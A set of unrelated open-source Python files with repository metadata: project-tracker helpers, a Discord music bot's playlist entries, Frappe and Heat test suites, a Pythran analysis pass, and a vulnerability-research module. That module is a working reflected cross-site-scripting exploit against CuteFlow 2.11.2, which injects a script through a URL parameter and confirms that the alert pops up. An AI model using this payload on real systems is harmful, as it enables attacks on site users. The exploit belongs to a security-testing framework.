project_id = lancet.config.get("tracker", "project_id")
issue = lancet.tracker.create_issue(
project_id=project_id,
summary=summary,
add_to_active_sprint=add_to_active_sprint,
)
ts.ok(f"Created issue {issue.id}: {issue.link}")
return issue
def assign_issue(lancet, issue, username, active_status):
with taskstatus(f"Assigning issue to {username}") as ts:
if not issue.assignees or username not in issue.assignees:
if issue.status == active_status:
ts.abort(
f"Issue already active and not assigned to {username}"
)
else:
issue.assign_to(username)
ts.ok(f"Issue assigned to {username}")
else:
ts.ok(f"Issue already assigned to {username}")
def assign_pull_request(lancet, pr, username):
with taskstatus(f"Assigning pull request to {username}") as ts:
if not pr.assignees or username not in pr.assignees:
pr.assign_to(username)
ts.ok(f"Pull request assigned to {username}")
else:
ts.ok(f"Pull request already assigned to {username}")
def get_branch(lancet, issue, base_branch=None, create=True):
if not base_branch:
base_branch = lancet.config.get("repository", "base_branch")
remote_name = lancet.config.get("repository", "remote_name")
name_getter = lancet.get_instance_from_config(
"repository", "branch_name_getter", lancet
)
branch_getter = BranchGetter(base_branch, name_getter, remote_name)
return branch_getter(lancet.repo, issue, create=create)
def get_project_keys(lancet):
workspace = os.path.expanduser(lancet.config.get("lancet", "workspace"))
config_files = glob.glob(os.path.join(workspace, "*", LOCAL_CONFIG))
for path in config_files:
config = load_config(path)
key = config.get("tracker", "default_project", fallback=None)
if key:
yield key, os.path.dirname(path)
def get_project_dirs(lancet):
workspace = os.path.expanduser(lancet.config.get("lancet", "workspace"))
for path in glob.glob(os.path.join(workspace, "*", ".lancet")):
path = os.path.dirname(path)
yield os.path.basename(path), path
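# Hedged usage sketch (editor's addition): the two generators above are small
# enough that a consumer usually just materialises them into lookup tables.
# `lancet` is any object exposing the config/workspace layout the helpers expect.
def _example_workspace_index(lancet):
    key_to_dir = dict(get_project_keys(lancet))    # tracker key -> checkout path
    name_to_dir = dict(get_project_dirs(lancet))   # directory name -> checkout path
    return key_to_dir, name_to_dir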
|
{
"content_hash": "9cbf40cda7b7f2e405667f175b4ea36a",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 81,
"avg_line_length": 34.458015267175576,
"alnum_prop": 0.5930438635356668,
"repo_name": "GaretJax/lancet",
"id": "cf2848f4968694048877c7105be020da0e58357f",
"size": "4514",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lancet/helpers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "81691"
},
{
"name": "Shell",
"bytes": "998"
}
],
"symlink_target": ""
}
|
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0022",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/edittemplate_step1.php?templateid=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
|
{
"content_hash": "cf4a3028ffb3ea009b36fc0241108f79",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 134,
"avg_line_length": 29.717391304347824,
"alnum_prop": 0.5581565471836137,
"repo_name": "UMD-SEAM/bugbox",
"id": "8489fa66c932313146c7adc8f5ee345fe8a4db3e",
"size": "1539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "framework/Exploits/CUTEFLOW_0022.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "33053"
},
{
"name": "CSS",
"bytes": "3304865"
},
{
"name": "Elixir",
"bytes": "5199"
},
{
"name": "Java",
"bytes": "22054"
},
{
"name": "JavaScript",
"bytes": "5143660"
},
{
"name": "PHP",
"bytes": "47086650"
},
{
"name": "Perl",
"bytes": "5111"
},
{
"name": "Python",
"bytes": "228074"
},
{
"name": "Ruby",
"bytes": "15397"
},
{
"name": "Shell",
"bytes": "126456"
},
{
"name": "XSLT",
"bytes": "345743"
}
],
"symlink_target": ""
}
|
import os
import re
import asyncio
import logging
import traceback
from enum import Enum
from .constructs import Serializable
from .exceptions import ExtractionError
from .utils import get_header, md5sum
LOG = logging.getLogger(__name__)
class EntryTypes(Enum):
""" TODO """
URL = 1
STEAM = 2
FILE = 3
def __str__(self):
return self.name
class BasePlaylistEntry(Serializable):
""" TODO """
def __init__(self):
self.filename = None
self.filename_thumbnail = None
self._is_downloading = False
self._waiting_futures = []
@property
def is_downloaded(self):
""" TODO """
if self._is_downloading:
return False
return bool(self.filename)
async def _download(self):
raise NotImplementedError
def get_ready_future(self):
"""
Returns a future that will fire when the song is ready to be played.
The future will either fire with the result (being the entry)
or an exception as to why the song download failed.
"""
future = asyncio.Future()
if self.is_downloaded:
# In the event that we're downloaded, we're already ready for
# playback.
future.set_result(self)
else:
# If we request a ready future, let's ensure that it'll actually
# resolve at one point.
asyncio.ensure_future(self._download())
self._waiting_futures.append(future)
return future
def _for_each_future(self, callback):
"""
Calls `callback` for each future that is not cancelled.
Absorbs and logs any errors that may have occurred.
"""
futures = self._waiting_futures
self._waiting_futures = []
for future in futures:
if future.cancelled():
continue
try:
callback(future)
except:
traceback.print_exc()
def __eq__(self, other):
return self is other
def __hash__(self):
return id(self)
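# Hedged usage sketch (editor's addition): how a consumer typically waits on the
# ready-future machinery defined in BasePlaylistEntry above. `entry` stands for
# any concrete subclass instance; nothing here is part of the upstream bot.
async def _example_wait_until_playable(entry: "BasePlaylistEntry") -> str:
    ready = entry.get_ready_future()  # schedules _download() if not cached yet
    playable_entry = await ready      # resolves once the file is on disk
    return playable_entry.filename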
class URLPlaylistEntry(BasePlaylistEntry):
""" TODO """
def __init__(self,
playlist,
url,
title,
duration=0,
start_seconds=0,
expected_filename=None,
filename_thumbnail=None,
**meta):
super().__init__()
self.playlist = playlist
self.url = url
self.title = title
self.duration = duration
self.start_seconds = start_seconds
self.expected_filename = expected_filename
self.filename_thumbnail = filename_thumbnail
self.meta = meta
self.download_folder = self.playlist.downloader.download_folder
def __json__(self):
return self._enclose_json({
'version': 2,
'url': self.url,
'title': self.title,
'duration': self.duration,
'start_seconds': self.start_seconds,
'downloaded': self.is_downloaded,
'expected_filename': self.expected_filename,
'filename': self.filename,
'filename_thumbnail': self.filename_thumbnail,
'meta': {
name: {
'type': obj.__class__.__name__,
'id': obj.id,
'name': obj.name
} for name, obj in self.meta.items() if obj
}
})
@classmethod
def _deserialize(cls, data, playlist=None):
assert playlist is not None, cls._bad('playlist')
try:
# TODO: version check
url = data['url']
title = data['title']
duration = data['duration']
start_seconds = data['start_seconds']
downloaded = data['downloaded']
filename = data['filename'] if downloaded else None
expected_filename = data['expected_filename'] \
if downloaded else None
filename_thumbnail = data['filename_thumbnail'] \
if downloaded else None
meta = {}
# TODO: Better [name] fallbacks
if 'channel' in data['meta']:
meta['channel'] = playlist.bot.get_channel(
data['meta']['channel']['id'])
if 'author' in data['meta']:
meta['author'] = meta['channel'].server.get_member(
data['meta']['author']['id'])
entry = cls(playlist, url, title, duration, start_seconds,
expected_filename, filename_thumbnail, **meta)
entry.filename = filename
return entry
except Exception as error:
LOG.error('Could not load %s', cls.__name__, exc_info=error)
# noinspection PyTypeChecker
async def _download(self):
if self._is_downloading:
return
self._is_downloading = True
try:
# Ensure the folder that we're going to move into exists.
if not os.path.exists(self.download_folder):
os.makedirs(self.download_folder)
if self.expected_filename:
# self.expected_filename:
# audio_cache\youtube-9R8aSKwTEMg-NOMA_-_Brain_Power.m4a
extractor = os.path.basename(self.expected_filename).split('-')[0]
# if os.name == 'nt':
# extractor = (self.expected_filename.split('-')[0]).rsplit('\\', 1)[-1]
# else:
# extractor = (self.expected_filename.split('-')[0]).rsplit('/', 1)[-1]
# the generic extractor requires special handling
if extractor == 'generic':
LOG.debug('Handling generic')
# remove thumbnail images from list
img_pattern = re.compile(
r'(\.(jpg|jpeg|png|gif|bmp))$', flags=re.IGNORECASE)
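                    # rsplit('-', 1)[0] strips the trailing "-<hash>.<ext>" segment
                    # that _really_download(hash=True) appends, so cached generic
                    # downloads can be matched by their base name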
flistdir = [f.rsplit('-', 1)[0] for f in
os.listdir(self.download_folder)
if not img_pattern.search(f)]
expected_fname_noex = os.path.basename(
                        self.expected_filename).rsplit('.', 1)[0]
if expected_fname_noex in flistdir:
try:
rsize = int(await get_header(
self.playlist.bot.aiosession,
self.url, 'CONTENT-LENGTH'))
except:
rsize = 0
lfile = os.path.join(
self.download_folder,
os.listdir(self.download_folder)[
flistdir.index(expected_fname_noex)]
)
LOG.debug('Resolved %s to %s', self.expected_filename, lfile)
lsize = os.path.getsize(lfile)
LOG.debug('Remote size: %s Local size: %s', rsize, lsize)
if lsize != rsize:
await self._really_download(hash=True)
else:
LOG.debug('[Download] Cached: %s', self.url)
self.filename = lfile
else:
LOG.debug('File not found in cache (%s)', expected_fname_noex)
await self._really_download(hash=True)
else:
img_pattern = re.compile(
r'(\.(jpg|jpeg|png|gif|bmp))$', flags=re.IGNORECASE)
ldir = [f for f in os.listdir(
self.download_folder) if not img_pattern.search(f)]
flistdir = [f.rsplit('.', 1)[0] for f in ldir]
expected_fname_base = os.path.basename(self.expected_filename)
expected_fname_noex = expected_fname_base.rsplit('.', 1)[0]
                    # Legacy fallback: the cached file may already be present,
                    # possibly under a different extension than expected_filename predicts.
if expected_fname_base in ldir:
self.filename = os.path.join(
self.download_folder, expected_fname_base)
img_pattern = re.compile(
r'({}\.(jpg|jpeg|png|gif|bmp))$'.format(
expected_fname_noex), flags=re.IGNORECASE)
self.filename_thumbnail = next(
os.path.join(self.download_folder, f)
for f in os.listdir(self.download_folder) if img_pattern.search(f))
LOG.info('Download cached: %s', self.url)
elif expected_fname_noex in flistdir:
LOG.info(
'Download cached (different extension): %s', self.url)
self.filename = os.path.join(
self.download_folder,
ldir[flistdir.index(expected_fname_noex)])
LOG.debug('Expected %s, got %s',
self.expected_filename.rsplit('.', 1)[-1],
self.filename.rsplit('.', 1)[-1]
)
else:
await self._really_download()
else:
# For cases where Config - SaveVideos = no and the bot resumes after a restart.
LOG.debug('Config - SaveVideos = no: Downloading the song again!')
await self._really_download()
# Trigger ready callbacks.
self._for_each_future(lambda future: future.set_result(self))
except Exception as error:
traceback.print_exc()
self._for_each_future(lambda future: future.set_exception(error))
finally:
self._is_downloading = False
# noinspection PyShadowingBuiltins
async def _really_download(self, *, hash=False):
LOG.info("Download started: '%s' \[%s\]" % (self.title, self.url))
try:
result = await self.playlist.downloader.extract_info(
self.playlist.loop, self.url, download=True)
except Exception as error:
raise ExtractionError(error)
LOG.info("Download complete: '%s' \[%s\]" % (self.title, self.url))
if result is None:
LOG.critical('YTDL has failed, everyone panic')
raise ExtractionError('ytdl broke and hell if I know why')
# What the fuck do I do now?
self.filename = unhashed_fname = \
self.playlist.downloader.ytdl.prepare_filename(result)
# Search for file name with an image suffix
img_pattern = re.compile(
r'({}\.(jpg|jpeg|png|gif|bmp))$'.format(
os.path.basename(self.filename).rsplit('.', 1)[0]), flags=re.IGNORECASE)
self.filename_thumbnail = next(
os.path.join(self.download_folder, f)
for f in os.listdir(self.download_folder) if img_pattern.search(f))
if hash:
# insert the 8 last characters of the file hash to the file name to
# ensure uniqueness
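            # e.g. "song.m4a" -> "song-1a2b3c4d.m4a" (hash value illustrative only)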
self.filename = md5sum(unhashed_fname, 8).join(
'-.').join(unhashed_fname.rsplit('.', 1))
if os.path.isfile(self.filename):
# Oh bother it was actually there.
os.unlink(unhashed_fname)
else:
                # Move the temporary file to its final location.
os.rename(unhashed_fname, self.filename)
def set_start(self, sec):
if sec > self.duration or sec < 0:
return False
self.start_seconds = sec
return True
class StreamPlaylistEntry(BasePlaylistEntry):
""" TODO """
def __init__(self, playlist, url, title, *, destination=None, **meta):
super().__init__()
self.playlist = playlist
self.url = url
self.title = title
self.destination = destination
self.duration = 0
self.meta = meta
if self.destination:
self.filename = self.destination
def __json__(self):
return self._enclose_json({
'version': 1,
'url': self.url,
'filename': self.filename,
'title': self.title,
'destination': self.destination,
'meta': {
name: {
'type': obj.__class__.__name__,
'id': obj.id,
'name': obj.name
} for name, obj in self.meta.items() if obj
}
})
@classmethod
def _deserialize(cls, data, playlist=None):
assert playlist is not None, cls._bad('playlist')
try:
# TODO: version check
url = data['url']
title = data['title']
destination = data['destination']
filename = data['filename']
meta = {}
# TODO: Better [name] fallbacks
if 'channel' in data['meta']:
channel = playlist.bot.get_channel(
data['meta']['channel']['id'])
meta['channel'] = channel or data['meta']['channel']['name']
if 'author' in data['meta']:
meta['author'] = meta['channel'].server.get_member(
data['meta']['author']['id'])
entry = cls(playlist, url, title, destination=destination, **meta)
if not destination and filename:
                entry.filename = filename
return entry
except Exception as error:
LOG.error('Could not load %s', cls.__name__, exc_info=error)
# noinspection PyMethodOverriding
async def _download(self, *, fallback=False):
self._is_downloading = True
url = self.destination if fallback else self.url
try:
result = await self.playlist.downloader.extract_info(
self.playlist.loop, url, download=False)
except Exception as error:
if not fallback and self.destination:
return await self._download(fallback=True)
raise ExtractionError(error)
else:
self.filename = result['url']
            # Some sort of event or hook may be needed for when ffmpeg
            # inevitably fails and playback has to restart, although that
            # probably belongs at a slightly lower level.
finally:
self._is_downloading = False
|
{
"content_hash": "e1e3ac8dfe466cc77465799bc146191d",
"timestamp": "",
"source": "github",
"line_count": 408,
"max_line_length": 99,
"avg_line_length": 36.3014705882353,
"alnum_prop": 0.5075957058942677,
"repo_name": "DiscordMusicBot/MusicBot",
"id": "6a35dac2fddfeb1753cf8a48edcdc521e895b952",
"size": "14811",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "musicbot/entry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "711"
},
{
"name": "Python",
"bytes": "260280"
}
],
"symlink_target": ""
}
|
import frappe
from frappe.test_runner import make_test_records
from frappe.tests.utils import FrappeTestCase
from frappe.utils import random_string
class TestAutoAssign(FrappeTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
frappe.db.delete("Assignment Rule")
@classmethod
def tearDownClass(cls):
frappe.db.rollback()
def setUp(self):
make_test_records("User")
days = [
dict(day="Sunday"),
dict(day="Monday"),
dict(day="Tuesday"),
dict(day="Wednesday"),
dict(day="Thursday"),
dict(day="Friday"),
dict(day="Saturday"),
]
self.days = days
self.assignment_rule = get_assignment_rule([days, days])
clear_assignments()
def test_round_robin(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test@example.com",
)
note = make_note(dict(public=1))
# check if auto assigned to second user
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test1@example.com",
)
clear_assignments()
note = make_note(dict(public=1))
# check if auto assigned to third user, even if
		# previous assignments were closed
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test2@example.com",
)
# check loop back to first user
note = make_note(dict(public=1))
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test@example.com",
)
def test_load_balancing(self):
self.assignment_rule.rule = "Load Balancing"
self.assignment_rule.save()
for _ in range(30):
note = make_note(dict(public=1))
		# check if each user has 10 assignments
for user in ("test@example.com", "test1@example.com", "test2@example.com"):
self.assertEqual(
len(frappe.get_all("ToDo", dict(allocated_to=user, reference_type="Note"))), 10
)
# clear 5 assignments for first user
# can't do a limit in "delete" since postgres does not support it
for d in frappe.get_all(
"ToDo", dict(reference_type="Note", allocated_to="test@example.com"), limit=5
):
frappe.db.delete("ToDo", {"name": d.name})
# add 5 more assignments
for i in range(5):
make_note(dict(public=1))
# check if each user still has 10 assignments
for user in ("test@example.com", "test1@example.com", "test2@example.com"):
self.assertEqual(
len(frappe.get_all("ToDo", dict(allocated_to=user, reference_type="Note"))), 10
)
def test_based_on_field(self):
self.assignment_rule.rule = "Based on Field"
self.assignment_rule.field = "owner"
self.assignment_rule.save()
frappe.set_user("test1@example.com")
note = make_note(dict(public=1))
# check if auto assigned to doc owner, test1@example.com
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "owner"
),
"test1@example.com",
)
frappe.set_user("test2@example.com")
note = make_note(dict(public=1))
# check if auto assigned to doc owner, test2@example.com
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "owner"
),
"test2@example.com",
)
frappe.set_user("Administrator")
def test_assign_condition(self):
# check condition
note = make_note(dict(public=0))
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
None,
)
def test_clear_assignment(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
todo = frappe.get_list(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), limit=1
)[0]
todo = frappe.get_doc("ToDo", todo["name"])
self.assertEqual(todo.allocated_to, "test@example.com")
# test auto unassign
note.public = 0
note.save()
todo.load_from_db()
# check if todo is cancelled
self.assertEqual(todo.status, "Cancelled")
def test_close_assignment(self):
note = make_note(dict(public=1, content="valid"))
# check if auto assigned
todo = frappe.get_list(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), limit=1
)[0]
todo = frappe.get_doc("ToDo", todo["name"])
self.assertEqual(todo.allocated_to, "test@example.com")
note.content = "Closed"
note.save()
todo.load_from_db()
# check if todo is closed
self.assertEqual(todo.status, "Closed")
# check if closed todo retained assignment
self.assertEqual(todo.allocated_to, "test@example.com")
def check_multiple_rules(self):
note = make_note(dict(public=1, notify_on_login=1))
# check if auto assigned to test3 (2nd rule is applied, as it has higher priority)
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test@example.com",
)
def check_assignment_rule_scheduling(self):
frappe.db.delete("Assignment Rule")
days_1 = [dict(day="Sunday"), dict(day="Monday"), dict(day="Tuesday")]
days_2 = [dict(day="Wednesday"), dict(day="Thursday"), dict(day="Friday"), dict(day="Saturday")]
get_assignment_rule([days_1, days_2], ["public == 1", "public == 1"])
frappe.flags.assignment_day = "Monday"
note = make_note(dict(public=1))
self.assertIn(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
["test@example.com", "test1@example.com", "test2@example.com"],
)
frappe.flags.assignment_day = "Friday"
note = make_note(dict(public=1))
self.assertIn(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
["test3@example.com"],
)
def test_assignment_rule_condition(self):
frappe.db.delete("Assignment Rule")
# Add expiry_date custom field
from frappe.custom.doctype.custom_field.custom_field import create_custom_field
df = dict(fieldname="expiry_date", label="Expiry Date", fieldtype="Date")
create_custom_field("Note", df)
assignment_rule = frappe.get_doc(
dict(
name="Assignment with Due Date",
doctype="Assignment Rule",
document_type="Note",
assign_condition="public == 0",
due_date_based_on="expiry_date",
assignment_days=self.days,
users=[
dict(user="test@example.com"),
],
)
).insert()
expiry_date = frappe.utils.add_days(frappe.utils.nowdate(), 2)
note1 = make_note({"expiry_date": expiry_date})
note2 = make_note({"expiry_date": expiry_date})
note1_todo = frappe.get_all(
"ToDo", filters=dict(reference_type="Note", reference_name=note1.name, status="Open")
)[0]
note1_todo_doc = frappe.get_doc("ToDo", note1_todo.name)
self.assertEqual(frappe.utils.get_date_str(note1_todo_doc.date), expiry_date)
# due date should be updated if the reference doc's date is updated.
note1.expiry_date = frappe.utils.add_days(expiry_date, 2)
note1.save()
note1_todo_doc.reload()
self.assertEqual(frappe.utils.get_date_str(note1_todo_doc.date), note1.expiry_date)
# saving one note's expiry should not update other note todo's due date
note2_todo = frappe.get_all(
"ToDo",
filters=dict(reference_type="Note", reference_name=note2.name, status="Open"),
fields=["name", "date"],
)[0]
self.assertNotEqual(frappe.utils.get_date_str(note2_todo.date), note1.expiry_date)
self.assertEqual(frappe.utils.get_date_str(note2_todo.date), expiry_date)
assignment_rule.delete()
		frappe.db.commit() # undo changes committed by DDL
def clear_assignments():
frappe.db.delete("ToDo", {"reference_type": "Note"})
def get_assignment_rule(days, assign=None):
frappe.delete_doc_if_exists("Assignment Rule", "For Note 1")
if not assign:
assign = ["public == 1", "notify_on_login == 1"]
assignment_rule = frappe.get_doc(
dict(
name="For Note 1",
doctype="Assignment Rule",
priority=0,
document_type="Note",
assign_condition=assign[0],
unassign_condition="public == 0 or notify_on_login == 1",
close_condition='"Closed" in content',
rule="Round Robin",
assignment_days=days[0],
users=[
dict(user="test@example.com"),
dict(user="test1@example.com"),
dict(user="test2@example.com"),
],
)
).insert()
frappe.delete_doc_if_exists("Assignment Rule", "For Note 2")
# 2nd rule
frappe.get_doc(
dict(
name="For Note 2",
doctype="Assignment Rule",
priority=1,
document_type="Note",
assign_condition=assign[1],
unassign_condition="notify_on_login == 0",
rule="Round Robin",
assignment_days=days[1],
users=[dict(user="test3@example.com")],
)
).insert()
return assignment_rule
def make_note(values=None):
note = frappe.get_doc(dict(doctype="Note", title=random_string(10), content=random_string(20)))
if values:
note.update(values)
note.insert()
return note
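# Hedged sketch (editor's addition): the round-robin behaviour exercised in
# test_round_robin above boils down to cycling through the configured users in
# order, regardless of whether earlier assignments are still open. The real
# Assignment Rule keeps its own counter; this stand-alone function only mirrors
# the expected sequence.
def _example_round_robin(users, processed_so_far):
	return users[processed_so_far % len(users)]


assert _example_round_robin(
	["test@example.com", "test1@example.com", "test2@example.com"], 3
) == "test@example.com"  # fourth document loops back to the first user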
|
{
"content_hash": "5ae47d73a692fefe675587260413bd30",
"timestamp": "",
"source": "github",
"line_count": 334,
"max_line_length": 98,
"avg_line_length": 27.592814371257486,
"alnum_prop": 0.6766493055555556,
"repo_name": "StrellaGroup/frappe",
"id": "8f1773608f9333144fa6759b6e2a19bd24d43be6",
"size": "9304",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/automation/doctype/assignment_rule/test_assignment_rule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "65093"
},
{
"name": "HTML",
"bytes": "250858"
},
{
"name": "JavaScript",
"bytes": "2515308"
},
{
"name": "Less",
"bytes": "10921"
},
{
"name": "Python",
"bytes": "3605011"
},
{
"name": "SCSS",
"bytes": "261492"
},
{
"name": "Vue",
"bytes": "98456"
}
],
"symlink_target": ""
}
|
"""
PotentialIterator finds whether it is possible to use an iterator.
"""
from pythran.analyses.aliases import Aliases
from pythran.analyses.argument_read_once import ArgumentReadOnce
from pythran.passmanager import NodeAnalysis
import gast as ast
class PotentialIterator(NodeAnalysis):
"""Find whether an expression can be replaced with an iterator."""
def __init__(self):
self.result = set()
NodeAnalysis.__init__(self, Aliases, ArgumentReadOnce)
def visit_For(self, node):
self.result.add(node.iter)
self.generic_visit(node)
def visit_Compare(self, node):
if isinstance(node.ops[0], (ast.In, ast.NotIn)):
self.result.update(node.comparators)
self.generic_visit(node)
def visit_Call(self, node):
for i, arg in enumerate(node.args):
def isReadOnce(f, i):
return (f in self.argument_read_once and
self.argument_read_once[f][i] <= 1)
if all(isReadOnce(alias, i) for alias in self.aliases[node.func]):
self.result.add(arg)
self.generic_visit(node)
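# Hedged illustration (editor's addition): on source like the snippet below, the
# three visitors above would mark `range(n)` (a for-loop's iter), `seq` (the
# comparator of an `in` test), and any call argument that every alias of the
# callee reads at most once. The string is example input only; actually running
# the analysis requires a pythran pass manager, which is not shown here.
_EXAMPLE_SOURCE = """
def f(n, seq):
    for i in range(n):   # node.iter -> potential iterator
        pass
    return n in seq      # comparator of `in` -> potential iterator
"""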
|
{
"content_hash": "2618999c605dfdaedf83d1efe158b7c0",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 78,
"avg_line_length": 32.17142857142857,
"alnum_prop": 0.6412078152753108,
"repo_name": "serge-sans-paille/pythran",
"id": "23c6b3ad30f8fc78ba01c118ecccd9bb4007911a",
"size": "1126",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pythran/analyses/potential_iterator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "2074873"
},
{
"name": "Cython",
"bytes": "1701"
},
{
"name": "Jupyter Notebook",
"bytes": "27461"
},
{
"name": "Makefile",
"bytes": "1162"
},
{
"name": "Python",
"bytes": "2025760"
}
],
"symlink_target": ""
}
|
import uuid
from heat.common import exception
from heat.common import template_format
from heat.engine import parser
from heat.engine.resources import subnet as sn
from heat.engine import scheduler
from heat.engine import template
from heat.tests.common import HeatTestCase
from heat.tests import utils
try:
from neutronclient.common.exceptions import NeutronClientException
from neutronclient.v2_0 import client as neutronclient
except ImportError:
neutronclient = None
class VPCTestBase(HeatTestCase):
def setUp(self):
super(VPCTestBase, self).setUp()
self.m.StubOutWithMock(neutronclient.Client, 'add_interface_router')
self.m.StubOutWithMock(neutronclient.Client, 'add_gateway_router')
self.m.StubOutWithMock(neutronclient.Client, 'create_network')
self.m.StubOutWithMock(neutronclient.Client, 'create_port')
self.m.StubOutWithMock(neutronclient.Client, 'create_router')
self.m.StubOutWithMock(neutronclient.Client, 'create_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'delete_network')
self.m.StubOutWithMock(neutronclient.Client, 'delete_port')
self.m.StubOutWithMock(neutronclient.Client, 'delete_router')
self.m.StubOutWithMock(neutronclient.Client, 'delete_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'list_networks')
self.m.StubOutWithMock(neutronclient.Client, 'list_routers')
self.m.StubOutWithMock(neutronclient.Client, 'remove_gateway_router')
self.m.StubOutWithMock(neutronclient.Client, 'remove_interface_router')
self.m.StubOutWithMock(neutronclient.Client, 'show_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'show_network')
self.m.StubOutWithMock(neutronclient.Client, 'show_port')
self.m.StubOutWithMock(neutronclient.Client, 'show_router')
self.m.StubOutWithMock(neutronclient.Client, 'create_security_group')
self.m.StubOutWithMock(neutronclient.Client, 'show_security_group')
self.m.StubOutWithMock(neutronclient.Client, 'list_security_groups')
self.m.StubOutWithMock(neutronclient.Client, 'delete_security_group')
self.m.StubOutWithMock(
neutronclient.Client, 'create_security_group_rule')
self.m.StubOutWithMock(
neutronclient.Client, 'delete_security_group_rule')
self.stub_keystoneclient()
def create_stack(self, templ):
t = template_format.parse(templ)
stack = self.parse_stack(t)
self.assertIsNone(stack.validate())
self.assertIsNone(stack.create())
return stack
def parse_stack(self, t):
stack_name = 'test_stack'
tmpl = template.Template(t)
stack = parser.Stack(utils.dummy_context(), stack_name, tmpl)
stack.store()
return stack
def mock_create_network(self):
self.vpc_name = utils.PhysName('test_stack', 'the_vpc')
neutronclient.Client.create_network(
{
'network': {'name': self.vpc_name}
}).AndReturn({'network': {
'status': 'BUILD',
'subnets': [],
'name': 'name',
'admin_state_up': True,
'shared': False,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'aaaa'
}})
neutronclient.Client.show_network(
'aaaa'
).AndReturn({"network": {
"status": "BUILD",
"subnets": [],
"name": self.vpc_name,
"admin_state_up": False,
"shared": False,
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"id": "aaaa"
}})
neutronclient.Client.show_network(
'aaaa'
).MultipleTimes().AndReturn({"network": {
"status": "ACTIVE",
"subnets": [],
"name": self.vpc_name,
"admin_state_up": False,
"shared": False,
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"id": "aaaa"
}})
neutronclient.Client.create_router(
{'router': {'name': self.vpc_name}}).AndReturn({
'router': {
'status': 'BUILD',
'name': self.vpc_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'bbbb'
}})
neutronclient.Client.list_routers(name=self.vpc_name).AndReturn({
"routers": [{
"status": "BUILD",
"external_gateway_info": None,
"name": self.vpc_name,
"admin_state_up": True,
"tenant_id": "3e21026f2dc94372b105808c0e721661",
"routes": [],
"id": "bbbb"
}]
})
self.mock_router_for_vpc()
def mock_create_subnet(self):
self.subnet_name = utils.PhysName('test_stack', 'the_subnet')
neutronclient.Client.create_subnet(
{'subnet': {
'network_id': u'aaaa',
'cidr': u'10.0.0.0/24',
'ip_version': 4,
'name': self.subnet_name}}).AndReturn({
'subnet': {
'status': 'ACTIVE',
'name': self.subnet_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'cccc'}})
self.mock_router_for_vpc()
neutronclient.Client.add_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndReturn(None)
def mock_show_subnet(self):
neutronclient.Client.show_subnet('cccc').AndReturn({
'subnet': {
'name': self.subnet_name,
'network_id': 'aaaa',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'allocation_pools': [{'start': '10.0.0.2',
'end': '10.0.0.254'}],
'gateway_ip': '10.0.0.1',
'ip_version': 4,
'cidr': '10.0.0.0/24',
'id': 'cccc',
'enable_dhcp': False,
}})
def mock_create_security_group(self):
self.sg_name = utils.PhysName('test_stack', 'the_sg')
neutronclient.Client.create_security_group({
'security_group': {
'name': self.sg_name,
